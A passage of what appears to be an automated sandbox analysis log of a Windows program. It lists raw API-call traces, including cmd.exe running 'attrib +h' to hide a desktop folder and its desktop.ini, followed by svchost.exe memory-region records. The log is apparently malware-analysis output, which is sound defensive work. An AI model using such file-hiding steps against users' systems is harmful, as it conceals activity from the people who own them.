nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, 
lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile 
(in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.485] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.486] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.562] FindClose (in: hFindFile=0x32e628 | out: hFindFile=0x32e628) returned 1 [0223.563] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0223.563] _close (_FileHandle=3) returned 0 [0223.563] GetConsoleTitleW (in: 
lpConsoleTitle=0x2af1a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.564] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0223.564] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0223.564] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0223.564] FindClose (in: hFindFile=0x32e628 | out: hFindFile=0x32e628) returned 1 [0223.564] FindClose (in: hFindFile=0x32e628 | out: hFindFile=0x32e628) returned 1 [0223.565] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0223.565] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0223.565] GetConsoleTitleW (in: lpConsoleTitle=0x2aef3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.565] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aedc4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aee8c | out: lpAttributeList=0x2aedc4, lpSize=0x2aee8c) returned 1 [0223.565] UpdateProcThreadAttribute (in: lpAttributeList=0x2aedc4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aee84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aedc4, lpPreviousValue=0x0) returned 1 [0223.565] GetStartupInfoW (in: lpStartupInfo=0x2aed80 | out: lpStartupInfo=0x2aed80*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0223.565] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0223.565] CreateProcessW (in: 
lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aee20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aee6c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\desktop.ini\" ", lpProcessInformation=0x2aee6c*(hProcess=0x4c, hThread=0x50, dwProcessId=0xd8c, dwThreadId=0xdb0)) returned 1 [0223.567] CloseHandle (hObject=0x50) returned 1 [0223.567] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0223.567] GetEnvironmentStringsW () returned 0x332cb0* [0223.568] FreeEnvironmentStringsW (penv=0x332cb0) returned 1 [0223.568] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0223.831] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2aed60 | out: lpExitCode=0x2aed60*=0x0) returned 1 [0223.831] CloseHandle (hObject=0x4c) returned 1 [0223.831] _vsnwprintf (in: _Buffer=0x2aeea8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aed6c | out: _Buffer="00000000") returned 8 [0223.831] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0223.831] GetEnvironmentStringsW () returned 0x332cb0* [0223.831] FreeEnvironmentStringsW (penv=0x332cb0) returned 1 [0223.831] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0223.831] GetEnvironmentStringsW () returned 0x332cb0* [0223.831] FreeEnvironmentStringsW (penv=0x332cb0) returned 1 [0223.831] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aedc4 
| out: lpAttributeList=0x2aedc4) [0223.831] GetConsoleTitleW (in: lpConsoleTitle=0x2af1a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.831] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0223.831] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0223.831] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0223.832] FindClose (in: hFindFile=0x32e628 | out: hFindFile=0x32e628) returned 1 [0223.832] FindClose (in: hFindFile=0x32e628 | out: hFindFile=0x32e628) returned 1 [0223.832] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0223.832] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0223.832] GetConsoleTitleW (in: lpConsoleTitle=0x2aef3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0223.832] InitializeProcThreadAttributeList (in: lpAttributeList=0x2aedc4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2aee8c | out: lpAttributeList=0x2aedc4, lpSize=0x2aee8c) returned 1 [0223.832] UpdateProcThreadAttribute (in: lpAttributeList=0x2aedc4, dwFlags=0x0, Attribute=0x60001, lpValue=0x2aee84, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2aedc4, lpPreviousValue=0x0) returned 1 [0223.832] GetStartupInfoW (in: lpStartupInfo=0x2aed80 | out: lpStartupInfo=0x2aed80*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0223.832] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned 
-1 [0223.832] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2aee20*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2aee6c | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"", lpProcessInformation=0x2aee6c*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdc0, dwThreadId=0x5e0)) returned 1 [0223.834] CloseHandle (hObject=0x4c) returned 1 [0223.834] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0223.834] GetEnvironmentStringsW () returned 0x333668* [0223.834] FreeEnvironmentStringsW (penv=0x333668) returned 1 [0223.834] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0223.910] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2aed60 | out: lpExitCode=0x2aed60*=0x0) returned 1 [0223.910] CloseHandle (hObject=0x50) returned 1 [0223.910] _vsnwprintf (in: _Buffer=0x2aeea8, _BufferCount=0x13, _Format="%08X", _ArgList=0x2aed6c | out: _Buffer="00000000") returned 8 [0223.910] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0223.910] GetEnvironmentStringsW () returned 0x333668* [0223.910] FreeEnvironmentStringsW (penv=0x333668) returned 1 [0223.910] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0223.910] GetEnvironmentStringsW () returned 0x333668* [0223.911] FreeEnvironmentStringsW (penv=0x333668) returned 1 [0223.911] DeleteProcThreadAttributeList (in: lpAttributeList=0x2aedc4 | out: 
lpAttributeList=0x2aedc4) [0223.911] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.911] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0223.911] _get_osfhandle (_FileHandle=1) returned 0x7 [0223.911] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0223.911] _get_osfhandle (_FileHandle=0) returned 0x3 [0223.911] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0223.911] SetConsoleInputExeNameW () returned 0x1 [0223.911] GetConsoleOutputCP () returned 0x1b5 [0223.911] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0223.911] SetThreadUILanguage (LangId=0x0) returned 0x409 [0223.911] exit (_Code=0) Process: id = "582" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7ea16160" os_pid = "0x2c4" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "298" os_parent_pid = "0x358" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000a37b" [0xc000000f], "LOCAL" [0x7] Region: id = 33296 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33297 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33298 start_va = 0x30000 end_va = 
0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 33299 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 33300 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 33301 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33302 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 33303 start_va = 0x110000 end_va = 0x117fff entry_point = 0x110000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 33304 start_va = 0x120000 end_va = 0x1e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 33305 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33306 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 33307 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 33308 start_va = 0x310000 end_va = 0x410fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 33309 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 33310 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type 
= private name = "private_0x0000000000430000" filename = "" Region: id = 33311 start_va = 0x440000 end_va = 0x4bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 33312 start_va = 0x4c0000 end_va = 0x8b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 33313 start_va = 0x8c0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 33314 start_va = 0x8e0000 end_va = 0x8fffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 33315 start_va = 0x900000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x0000000000900000" filename = "" Region: id = 33316 start_va = 0x920000 end_va = 0x93ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 33317 start_va = 0x940000 end_va = 0x940fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 33318 start_va = 0x950000 end_va = 0x950fff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 33319 start_va = 0x960000 end_va = 0x961fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000960000" filename = "" Region: id = 33320 start_va = 0x970000 end_va = 0x970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 33321 start_va = 0x980000 end_va = 0x980fff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 33322 start_va = 0x9a0000 end_va = 0x9e0fff entry_point = 0x9a0000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 33323 start_va = 0x9f0000 end_va = 
0x9f0fff entry_point = 0x0 region_type = private name = "private_0x00000000009f0000" filename = "" Region: id = 33324 start_va = 0xa00000 end_va = 0xa3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 33325 start_va = 0xa40000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 33326 start_va = 0xb80000 end_va = 0xe4efff entry_point = 0xb80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 33327 start_va = 0xe50000 end_va = 0xe8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 33328 start_va = 0xe90000 end_va = 0xe90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 33329 start_va = 0xea0000 end_va = 0xea1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 33330 start_va = 0xeb0000 end_va = 0xeeffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 33331 start_va = 0xef0000 end_va = 0xf2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 33332 start_va = 0xf30000 end_va = 0xf30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f30000" filename = "" Region: id = 33333 start_va = 0xf60000 end_va = 0xf9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f60000" filename = "" Region: id = 33334 start_va = 0xfe0000 end_va = 0xfe7fff entry_point = 0x0 region_type = private name = "private_0x0000000000fe0000" filename = "" Region: id = 33335 start_va = 0xff0000 end_va = 0x1037fff entry_point = 0xff0000 region_type = mapped_file name = "winlogon.exe" filename = 
"\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 33336 start_va = 0x1040000 end_va = 0x107ffff entry_point = 0x0 region_type = private name = "private_0x0000000001040000" filename = "" Region: id = 33337 start_va = 0x1090000 end_va = 0x10cffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 33338 start_va = 0x10d0000 end_va = 0x1117fff entry_point = 0x10d0000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 33339 start_va = 0x1150000 end_va = 0x124ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 33340 start_va = 0x1260000 end_va = 0x129ffff entry_point = 0x0 region_type = private name = "private_0x0000000001260000" filename = "" Region: id = 33341 start_va = 0x12e0000 end_va = 0x13dffff entry_point = 0x0 region_type = private name = "private_0x00000000012e0000" filename = "" Region: id = 33342 start_va = 0x1440000 end_va = 0x147ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 33343 start_va = 0x14b0000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x00000000014b0000" filename = "" Region: id = 33344 start_va = 0x1500000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 33345 start_va = 0x15a0000 end_va = 0x15dffff entry_point = 0x0 region_type = private name = "private_0x00000000015a0000" filename = "" Region: id = 33346 start_va = 0x1650000 end_va = 0x168ffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 33347 start_va = 0x16d0000 end_va = 0x170ffff entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 33348 start_va = 0x1730000 
end_va = 0x176ffff entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 33349 start_va = 0x17a0000 end_va = 0x17dffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 33350 start_va = 0x17e0000 end_va = 0x19dffff entry_point = 0x0 region_type = private name = "private_0x00000000017e0000" filename = "" Region: id = 33351 start_va = 0x19e0000 end_va = 0x1ddffff entry_point = 0x0 region_type = private name = "private_0x00000000019e0000" filename = "" Region: id = 33352 start_va = 0x1e40000 end_va = 0x1e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e40000" filename = "" Region: id = 33353 start_va = 0x1e90000 end_va = 0x1ecffff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 33354 start_va = 0x1ed0000 end_va = 0x22d1fff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 33355 start_va = 0x22f0000 end_va = 0x232ffff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 33356 start_va = 0x2420000 end_va = 0x245ffff entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 33357 start_va = 0x24b0000 end_va = 0x24effff entry_point = 0x0 region_type = private name = "private_0x00000000024b0000" filename = "" Region: id = 33358 start_va = 0x2500000 end_va = 0x253ffff entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 33359 start_va = 0x2540000 end_va = 0x25bffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 33360 start_va = 0x6dee0000 end_va = 0x6df6bfff entry_point = 0x6dee0000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 33361 start_va 
= 0x6df70000 end_va = 0x6e05afff entry_point = 0x6df70000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 33362 start_va = 0x6e460000 end_va = 0x6e474fff entry_point = 0x6e460000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 33363 start_va = 0x6e560000 end_va = 0x6e595fff entry_point = 0x6e560000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 33364 start_va = 0x6e710000 end_va = 0x6e723fff entry_point = 0x6e710000 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 33365 start_va = 